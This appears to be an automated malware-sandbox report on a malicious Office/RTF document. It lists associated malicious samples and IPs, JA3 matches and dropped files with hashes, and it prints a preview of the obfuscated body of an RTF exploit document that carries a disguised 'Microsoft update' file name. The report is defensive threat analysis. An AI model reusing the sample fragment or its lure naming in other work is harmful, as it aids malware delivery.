                                                  • 172.67.215.45

                                                  ASNs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  CLOUDFLARENETUShttps://121202.stephene.workers.dev/?27307#toto@titi.comGet hashmaliciousUnknownBrowse
                                                  • 104.21.15.191
                                                  https://onlinestores.factorysale2023outlet.ru/?c=tasse%20kaffee%20gifGet hashmaliciousUnknownBrowse
                                                  • 172.67.72.244
                                                  RFQ.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 172.67.190.93
                                                  mpsl-20240214-0634.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 1.13.111.35
                                                  pF4qvp3MTb.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                  • 172.64.41.3
                                                  https://www.canva.com/design/DAF7gvwCDHc/viewGet hashmaliciousUnknownBrowse
                                                  • 104.17.239.159
                                                  oowDCOLXv5.exeGet hashmaliciousLummaC, Babuk, Djvu, RedLine, SmokeLoader, Stealc, VidarBrowse
                                                  • 172.67.139.220
                                                  acQQDjNOw8.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                  • 1.1.1.1
                                                  F7uYlkAOh8.exeGet hashmaliciousLummaC, Glupteba, Raccoon Stealer v2, SmokeLoader, StealcBrowse
                                                  • 172.67.217.100
                                                  https://hiltonrfp.comGet hashmaliciousUnknownBrowse
                                                  • 1.1.1.1
                                                  THEZONEBGyG2R4zAif8.exeGet hashmaliciousAsyncRAT, PureLog Stealer, zgRATBrowse
                                                  • 91.92.251.202
                                                  DRYDBt88xl.elfGet hashmaliciousMiraiBrowse
                                                  • 91.92.247.79
                                                  6RlWFjrIwq.elfGet hashmaliciousMiraiBrowse
                                                  • 91.92.247.79
                                                  CEprUkpdNY.elfGet hashmaliciousMiraiBrowse
                                                  • 91.92.247.79
                                                  jgpA3u3MbG.elfGet hashmaliciousMiraiBrowse
                                                  • 91.92.247.79
                                                  M86A89OOVo.elfGet hashmaliciousMiraiBrowse
                                                  • 91.92.247.79
                                                  Scan_Zayavlenie_1416-02-24_13-02-2024.jpg.lnkGet hashmaliciousReverse SSHBrowse
                                                  • 91.92.248.36
                                                  P018400.xla.xlsxGet hashmaliciousUnknownBrowse
                                                  • 91.92.244.96
                                                  PO-65547.jsGet hashmaliciousWSHRATBrowse
                                                  • 91.92.249.69
                                                  RFQ l MR24000112.xla.xlsxGet hashmaliciousUnknownBrowse
                                                  • 91.92.244.96
                                                  CLOUDFLARENETUShttps://121202.stephene.workers.dev/?27307#toto@titi.comGet hashmaliciousUnknownBrowse
                                                  • 104.21.15.191
                                                  https://onlinestores.factorysale2023outlet.ru/?c=tasse%20kaffee%20gifGet hashmaliciousUnknownBrowse
                                                  • 172.67.72.244
                                                  RFQ.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 172.67.190.93
                                                  mpsl-20240214-0634.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 1.13.111.35
                                                  pF4qvp3MTb.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                  • 172.64.41.3
                                                  https://www.canva.com/design/DAF7gvwCDHc/viewGet hashmaliciousUnknownBrowse
                                                  • 104.17.239.159
                                                  oowDCOLXv5.exeGet hashmaliciousLummaC, Babuk, Djvu, RedLine, SmokeLoader, Stealc, VidarBrowse
                                                  • 172.67.139.220
                                                  acQQDjNOw8.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                                                  • 1.1.1.1
                                                  F7uYlkAOh8.exeGet hashmaliciousLummaC, Glupteba, Raccoon Stealer v2, SmokeLoader, StealcBrowse
                                                  • 172.67.217.100
                                                  https://hiltonrfp.comGet hashmaliciousUnknownBrowse
                                                  • 1.1.1.1

                                                  JA3 Fingerprints

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  05af1f5ca1b87cc9cc9b25185115607dSecuriteInfo.com.Script.SNH-gen.13421.25283.xlsxGet hashmaliciousUnknownBrowse
                                                  • 104.21.84.67
                                                  • 104.21.45.138
                                                  BankPaymAdviceVend.Report.docx.docGet hashmaliciousRemcosBrowse
                                                  • 104.21.84.67
                                                  • 104.21.45.138
                                                  P018400.xla.xlsxGet hashmaliciousUnknownBrowse
                                                  • 104.21.84.67
                                                  • 104.21.45.138
                                                  comprobante0089.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                                                  • 104.21.84.67
                                                  • 104.21.45.138
                                                  RFQ l MR24000112.xla.xlsxGet hashmaliciousUnknownBrowse
                                                  • 104.21.84.67
                                                  • 104.21.45.138
                                                  cotizaci#U00f3n para nuevo pedido.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                                                  • 104.21.84.67
                                                  • 104.21.45.138
                                                  PaymentEUR41000.xlsGet hashmaliciousRemcosBrowse
                                                  • 104.21.84.67
                                                  • 104.21.45.138
                                                  Yeni fatura.docx.docGet hashmaliciousRemcosBrowse
                                                  • 104.21.84.67
                                                  • 104.21.45.138
                                                  Purchase Order#2354789.xlsGet hashmaliciousRemcosBrowse
                                                  • 104.21.84.67
                                                  • 104.21.45.138
                                                  240202PIMXF24C.docx.docGet hashmaliciousRemcosBrowse
                                                  • 104.21.84.67
                                                  • 104.21.45.138

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Cache\data_1

                                                  Download File
                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                  File Type:data
                                                  Category:modified
                                                  Size (bytes):270336
                                                  Entropy (8bit):0.0018885380473555064
                                                  Encrypted:false
                                                  SSDEEP:3:MsEllllkEthXllkl2zE+/PXl:/M/xT02znXl
                                                  MD5:42205A1889CC10B1C14FDE1D30149E84
                                                  SHA1:98602FF17FD9E0EEEC9BD2794714C481721F1001
                                                  SHA-256:2C73FEE5B7DAB935B1431B8973547AB4E70125A66A180ECE39036105CE50B5D7
                                                  SHA-512:15168E20425924F459F3BD6C1D263E88779737C398891C231527AA10E28F100C34392EB8361003DDFBD882B48B026DB7D4CFDEF85524B81DD0237E95A0CC6CCA
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                                                  Download File
                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):292
                                                  Entropy (8bit):5.192734988292065
                                                  Encrypted:false
                                                  SSDEEP:6:53+q2PP2nKuAl9OmbnIFUt8IGZmw+ICVkwOP2nKuAl9OmbjLJ:5OvWHAahFUt8IG/+I657HAaSJ
                                                  MD5:D03041E810C92C73EC0AD10993DF0D85
                                                  SHA1:19866B45D4E378DD7048F29324C666DCE6A35433
                                                  SHA-256:5C550954DBEDCB355B6C97E0746365624EAEA3770B469D6AB7E0A742FFACB4D6
                                                  SHA-512:BFC24AEDF6B897F5A80A9FABD900165658472A334EA33F0460D90E87C8F95981191B4295DD0E1C866EA1B2A7E0BA7326FC0C13CC385089526D663B937CBF7CC0
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:2024/02/14-08:30:19.542 2448 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/02/14-08:30:19.545 2448 Recovering log #3.2024/02/14-08:30:19.545 2448 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

                                                  Download File
                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):292
                                                  Entropy (8bit):5.192734988292065
                                                  Encrypted:false
                                                  SSDEEP:6:53+q2PP2nKuAl9OmbnIFUt8IGZmw+ICVkwOP2nKuAl9OmbjLJ:5OvWHAahFUt8IG/+I657HAaSJ
                                                  MD5:D03041E810C92C73EC0AD10993DF0D85
                                                  SHA1:19866B45D4E378DD7048F29324C666DCE6A35433
                                                  SHA-256:5C550954DBEDCB355B6C97E0746365624EAEA3770B469D6AB7E0A742FFACB4D6
                                                  SHA-512:BFC24AEDF6B897F5A80A9FABD900165658472A334EA33F0460D90E87C8F95981191B4295DD0E1C866EA1B2A7E0BA7326FC0C13CC385089526D663B937CBF7CC0
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:2024/02/14-08:30:19.542 2448 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/02/14-08:30:19.545 2448 Recovering log #3.2024/02/14-08:30:19.545 2448 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old~RF6f200f.TMP (copy)

                                                  Download File
                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):292
                                                  Entropy (8bit):5.192734988292065
                                                  Encrypted:false
                                                  SSDEEP:6:53+q2PP2nKuAl9OmbnIFUt8IGZmw+ICVkwOP2nKuAl9OmbjLJ:5OvWHAahFUt8IG/+I657HAaSJ
                                                  MD5:D03041E810C92C73EC0AD10993DF0D85
                                                  SHA1:19866B45D4E378DD7048F29324C666DCE6A35433
                                                  SHA-256:5C550954DBEDCB355B6C97E0746365624EAEA3770B469D6AB7E0A742FFACB4D6
                                                  SHA-512:BFC24AEDF6B897F5A80A9FABD900165658472A334EA33F0460D90E87C8F95981191B4295DD0E1C866EA1B2A7E0BA7326FC0C13CC385089526D663B937CBF7CC0
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:2024/02/14-08:30:19.542 2448 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/02/14-08:30:19.545 2448 Recovering log #3.2024/02/14-08:30:19.545 2448 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Visited Links

                                                  Download File
                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):131072
                                                  Entropy (8bit):0.005597679101775777
                                                  Encrypted:false
                                                  SSDEEP:3:ImtVOM1xVlt/XSxdltIt/l:IiVfxlKxdXI1l
                                                  MD5:FD55D575475A6BD81B055F46FA34BA8B
                                                  SHA1:289A6344929F221E19D2F9097A5907FE42C03855
                                                  SHA-256:261CE45767DBF1E61AAF67C5EC1D75C2FF5C02681DF96897D5B0EC56A0F8C2AB
                                                  SHA-512:F2247D89C3268E838AE6F4BCDC1C4BB9C60E4F2E05B1763CD152811661A00B8BFC467F71009894676E38CE31229DF35F6FC9F2F19C2911698012D0594697F098
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview:VLnk.....?......LhXJ ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt19.lst (copy)

                                                  Download File
                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                  File Type:PostScript document text
                                                  Category:dropped
                                                  Size (bytes):536
                                                  Entropy (8bit):5.17576513886526
                                                  Encrypted:false
                                                  SSDEEP:12:T4RFQ8idRuMgxg6dxs3yBFTtDcSTAzidRuOPgxg601s3yBFDHpcSa:kNid8HxPs3yTTtPmid8OPgx4s3yTDHBa
                                                  MD5:4D5E3CD969F14362210F0473720C5528
                                                  SHA1:AFD90E9888759B809F78E87D5550B601A288A0A3
                                                  SHA-256:79D95D01FDE7FC7C890CD62734A7F203B12A5D44A56D6009D0E43E40D99682AE
                                                  SHA-512:B10C157945432CC8944E63A28CA3420CAD0C6B87BABC77BB5437DA5E3DF0CDEB657D410F28FA61D314E86269B8D1AC5972B0792D3E78787DFCE496EEE979DF64
                                                  Malicious:false
                                                  Preview:%!Adobe-FontList 1.16.%Locale:0x409..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1426577652.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1426577652.%EndFont..

                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt16.lst.3792

                                                  Download File
                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                  File Type:PostScript document text
                                                  Category:dropped
                                                  Size (bytes):536
                                                  Entropy (8bit):5.17576513886526
                                                  Encrypted:false
                                                  SSDEEP:12:T4RFQ8idRuMgxg6dxs3yBFTtDcSTAzidRuOPgxg601s3yBFDHpcSa:kNid8HxPs3yTTtPmid8OPgx4s3yTDHBa
                                                  MD5:4D5E3CD969F14362210F0473720C5528
                                                  SHA1:AFD90E9888759B809F78E87D5550B601A288A0A3
                                                  SHA-256:79D95D01FDE7FC7C890CD62734A7F203B12A5D44A56D6009D0E43E40D99682AE
                                                  SHA-512:B10C157945432CC8944E63A28CA3420CAD0C6B87BABC77BB5437DA5E3DF0CDEB657D410F28FA61D314E86269B8D1AC5972B0792D3E78787DFCE496EEE979DF64
                                                  Malicious:false
                                                  Preview:%!Adobe-FontList 1.16.%Locale:0x409..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1426577652.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1426577652.%EndFont..

                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt19.lst (copy)

                                                  Download File
                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                  File Type:PostScript document text
                                                  Category:dropped
                                                  Size (bytes):536
                                                  Entropy (8bit):5.17576513886526
                                                  Encrypted:false
                                                  SSDEEP:12:T4RFQ8idRuMgxg6dxs3yBFTtDcSTAzidRuOPgxg601s3yBFDHpcSa:kNid8HxPs3yTTtPmid8OPgx4s3yTDHBa
                                                  MD5:4D5E3CD969F14362210F0473720C5528
                                                  SHA1:AFD90E9888759B809F78E87D5550B601A288A0A3
                                                  SHA-256:79D95D01FDE7FC7C890CD62734A7F203B12A5D44A56D6009D0E43E40D99682AE
                                                  SHA-512:B10C157945432CC8944E63A28CA3420CAD0C6B87BABC77BB5437DA5E3DF0CDEB657D410F28FA61D314E86269B8D1AC5972B0792D3E78787DFCE496EEE979DF64
                                                  Malicious:false
                                                  Preview:%!Adobe-FontList 1.16.%Locale:0x409..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1426577652.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1426577652.%EndFont..

                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt19.lst (copy)

                                                  Download File
                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                  File Type:PostScript document text
                                                  Category:dropped
                                                  Size (bytes):9566
                                                  Entropy (8bit):5.226610011802065
                                                  Encrypted:false
                                                  SSDEEP:192:eTA2j6Q6T766x626Oz6r606+6bfs6JtRZ65tsu6rtG16lMXY5B5Cfk:es4p0vTLcdfIfsmtRZEtsuatG1gMIzV
                                                  MD5:63B24EA3A13EAC476D6309BB202EF459
                                                  SHA1:89502C393549C20C933E4553F51F74F3DBE085EF
                                                  SHA-256:2B4BE0BED267BBD4E4FFFC912A6C7ED6A8D4735DCF9B69FF90F37CDDEF4110EA
                                                  SHA-512:2CB315DD00867DEE3A2CBC4017B59C53B41E817216FE0111A60947E1F0D81FF6767D8F7B5C406AAF9E6516BE716A086642AFFABBEFBE4C5B260437C89E3535EC
                                                  Malicious:false
                                                  Preview:%!Adobe-FontList 1.16.%Locale:0x409..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1426577652.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1426577652.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:Type1.FontName:AdobePiStd.FamilyName:Adobe Pi Std.StyleName:Regular.FullName:Adobe Pi Std.MenuName:Adobe Pi Std.StyleBits:0.WritingScript:Roman.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\AdobePiStd.otf.DataFormat:sfntData.UsesStandardEncoding:yes.isCFF:yes.FileLength:92588.FileModTime:1426577650.WeightClass:400.WidthClass:5.AngleClass:0.DesignSize:240.NameArray:0,Mac,4,Adobe Pi Std.

                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt16.lst.3792

                                                  Download File
                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                  File Type:PostScript document text
                                                  Category:dropped
                                                  Size (bytes):9566
                                                  Entropy (8bit):5.226610011802065
                                                  Encrypted:false
                                                  SSDEEP:192:eTA2j6Q6T766x626Oz6r606+6bfs6JtRZ65tsu6rtG16lMXY5B5Cfk:es4p0vTLcdfIfsmtRZEtsuatG1gMIzV
                                                  MD5:63B24EA3A13EAC476D6309BB202EF459
                                                  SHA1:89502C393549C20C933E4553F51F74F3DBE085EF
                                                  SHA-256:2B4BE0BED267BBD4E4FFFC912A6C7ED6A8D4735DCF9B69FF90F37CDDEF4110EA
                                                  SHA-512:2CB315DD00867DEE3A2CBC4017B59C53B41E817216FE0111A60947E1F0D81FF6767D8F7B5C406AAF9E6516BE716A086642AFFABBEFBE4C5B260437C89E3535EC
                                                  Malicious:false
                                                  Preview:%!Adobe-FontList 1.16.%Locale:0x409..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1426577652.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1426577652.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:Type1.FontName:AdobePiStd.FamilyName:Adobe Pi Std.StyleName:Regular.FullName:Adobe Pi Std.MenuName:Adobe Pi Std.StyleBits:0.WritingScript:Roman.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\AdobePiStd.otf.DataFormat:sfntData.UsesStandardEncoding:yes.isCFF:yes.FileLength:92588.FileModTime:1426577650.WeightClass:400.WidthClass:5.AngleClass:0.DesignSize:240.NameArray:0,Mac,4,Adobe Pi Std.

                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat

                                                  Download File
                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):160075
                                                  Entropy (8bit):2.453241169056021
                                                  Encrypted:false
                                                  SSDEEP:1536:FNTBeJFFFFFFp7LDyWCsrtpyxxxxxxVzS:SDyt
                                                  MD5:256261A7EDF8C87A9E88A94251B1CF06
                                                  SHA1:D89950478EF135A7400018DAAF577F4A05EE493D
                                                  SHA-256:6FCD69E2A3D25B12D7A793CAB044B86516C4875CB70514A4DAE41FCEC74880A1
                                                  SHA-512:8A949C0DEFC31E38D8802505C914755BCD250E6918D5E45E593A6853BECB25B9DDC812C1EF90DC3A4BF667D9A558AFAE1136193A12C380ECE51AD247C409AF13
                                                  Malicious:false
                                                  Preview:Adobe Acrobat Reader DC 19.0....?A12_SelectObject.................................................................................................................................................~~~@~~~ ........................................................................................~~~.~~~.~~~.....................................................................................~~~.~~~.~~~.~~~`................................................................................~~~.~~~.~~~.~~~.~~~`............................................................................~~~.~~~.~~~.~~~.~~~.~~~@........................................................................~~~.~~~.~~~.~~~.~~~.~~~.~~~0....................................................................~~~.~~~.~~~.~~~.~~~.~~~.~~~.~~~0................................................................~~~.~~~.~~~.~~~.~~~.~~~.~~~.~~~.~~~.............................................................~~~.~~~.~~~.~~~.~~~.~~~.~~~.~~~.~~~.~~

                                                  C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):131072
                                                  Entropy (8bit):0.025523001643528637
                                                  Encrypted:false
                                                  SSDEEP:6:I3DPcYRvxggLRDFbLEltOt7+3RXv//4tfnRujlw//+GtluJ/eRuj:I3DP1dvVMtO2vYg3J/
                                                  MD5:23093CF3CAFC92A74571AFFDDA94308F
                                                  SHA1:2D1784C7B012E3822643CEE49D4CA0EFE4250A89
                                                  SHA-256:7280CF47016F138305F7832DE0F695A192CC2D382CA528FBCE167752EDA63E81
                                                  SHA-512:0FFA94E1578E6116C8D71FAD1F8D8F6AA5BB752EE6D85820ACFACB9C4B96D25244FFD666A18ABF5BBABFF07F46D8A057D1811E54CBABCFD8D50940409958B138
                                                  Malicious:false
                                                  Preview:......M.eFy...z.7....^A.L....V.S,...X.F...Fa.q............................T...l.rC...a.h.3..........4.i..F..Y...A......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):4760
                                                  Entropy (8bit):4.831175347448903
                                                  Encrypted:false
                                                  SSDEEP:96:ACJ2Woe5v2k6Lm5emmXIGbgyg12jDs+un/iQLEYFjDaeWJ6KGcmXoFRLcU6/KD:vxoe5vVsm5emdkgkjDt4iWN3yBGHUdcY
                                                  MD5:A50F0B3600A83789D28B424D69626266
                                                  SHA1:0183DA34933788FF97602C9DEA82F39CAD0697C2
                                                  SHA-256:7B188A9EEAC0649E088208C137625F64175EDAC8AE7F25D8A0F8B5611C824A8A
                                                  SHA-512:335DCAA6FE83BC0F492B353C036EA2A5CA52ECE628520A3E50BAF7C373D4CDBAC7585341D91D9B210C3EC4378525AA934CCB5BB418C4D776105FBB59F4873216
                                                  Malicious:false
                                                  Preview:PSMODULECACHE......%+./...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........%+./...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):64
                                                  Entropy (8bit):0.34726597513537405
                                                  Encrypted:false
                                                  SSDEEP:3:Nlll:Nll
                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                  Malicious:false
                                                  Preview:@...e...........................................................

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\mcirosfotupdatednewbabyprojectrelatedballonupdationtoimprovethenewupdationfasterthanbeforetoentirepcupday[1].doc

                                                  Download File
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:ISO-8859 text, with very long lines (5401), with CRLF, CR, LF line terminators
                                                  Category:dropped
                                                  Size (bytes):67643
                                                  Entropy (8bit):2.9983391639254893
                                                  Encrypted:false
                                                  SSDEEP:1536:+WGDJndDqB5XXd5a8TeKJjZaQHlYARQ1AkcHWF6XyuXfzPZH:re25HTeKJjgAi1AkkRzX7PZH
                                                  MD5:7065A2AB5D47E53ED852CC5130A3EFA8
                                                  SHA1:00B638CE9D0934409A082F12269275F46DDD364C
                                                  SHA-256:8D0A03FFC1C56993FEC78941ADC7388A5C3AFD7D498C1C1FC6470D6C2D621473
                                                  SHA-512:A994D995DF1AE81EB6CBA7DEE659E2F2D09E9D85A6C4E3BAF268560F241AA92779D28626AB6146A9BB97EF5E1AF21D958895E8DE7258B3E0DE6572E689B3D7F0
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\mcirosfotupdatednewbabyprojectrelatedballonupdationtoimprovethenewupdationfasterthanbeforetoentirepcupday[1].doc, Author: ditekSHen
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Preview:{\rt.......{\*\mzeroAsc859185810 \+}.{\196784969*.2%-]58,:6_-&|9.|;+//].=&_>@.7?3~!..2]4,9.`?$$8%.83?+~23^..??$@^<'%??!%2-?8$`?%=1_5>`0#8%0~/?(..]=*:|?:;?!,<1*..;1.)0;[?[^$?.!..8(.?48[257^[?=0?,0.8(7%*]*`._+0?506`.,41!?|9.?<?6?#9$.?_.&.9?8$)%)4:)99)]]3$`@#1*[!?8!).%^6*.~??+((??-3?6~_,?..94@&1.1?72=?.?.+?1%.``9*%!=$^..|4('.#.)|-~,1:]!7>!.`:`_)=.~.|-.><?%..~^>~].!?)~[<70/^9..<,!#;?~.5|%/^.%#?/.'+,@?[^?7)<>?@']_5*$]%>(9=&?6#7`:&$&#!-%?'?7:3[(4)>._@/*2..-63%43:+%5-(?;#(2<,?4:|-]?.->/>>.??8?=?]+?)25%!2?:[0.7[':<.8+?5|.,45)/4]'<|_,!.9>3#)~,^5.:*7.8*90*18^`_3..??4!4[4?;.@[6=0$%?./?9~?'?:[-6>3]'??~?1]+1]=8.~$5;.&[)?-4-.=?(0~^;-_-0%.@7_+]:(~;6**5@7!$./'(,9=877<4.._*;]~<4?-`?|/.(.<|5;>)2<^]%?~6,>(_8#1??%].7':!?:_>.`?%5_1?;;5~#,~++?&_.,'_[.~>_4,|?]]8@..`,5?:&!~-%61?#1_%.:`!0`(+3?5?@7#?[&~+0~'..#87_<?<+.]-~%9~<.:.&@,?&>?/-$|8'|?2<???_???_]%0.*#1@#>`-.!#|~;:#.[2@6?9;4:-.?#.*20%?-!.<9?5`><5;%5^?#.[#1%,(~.$`5~/+.4;_?2)|(@~1<^:,8|;-.??3@@2(~0@9;;&.1(!(*.,75)_?:8;)70?4--?>@0(/'<2#>|:,)?(3%$&0#.4#-08,(8

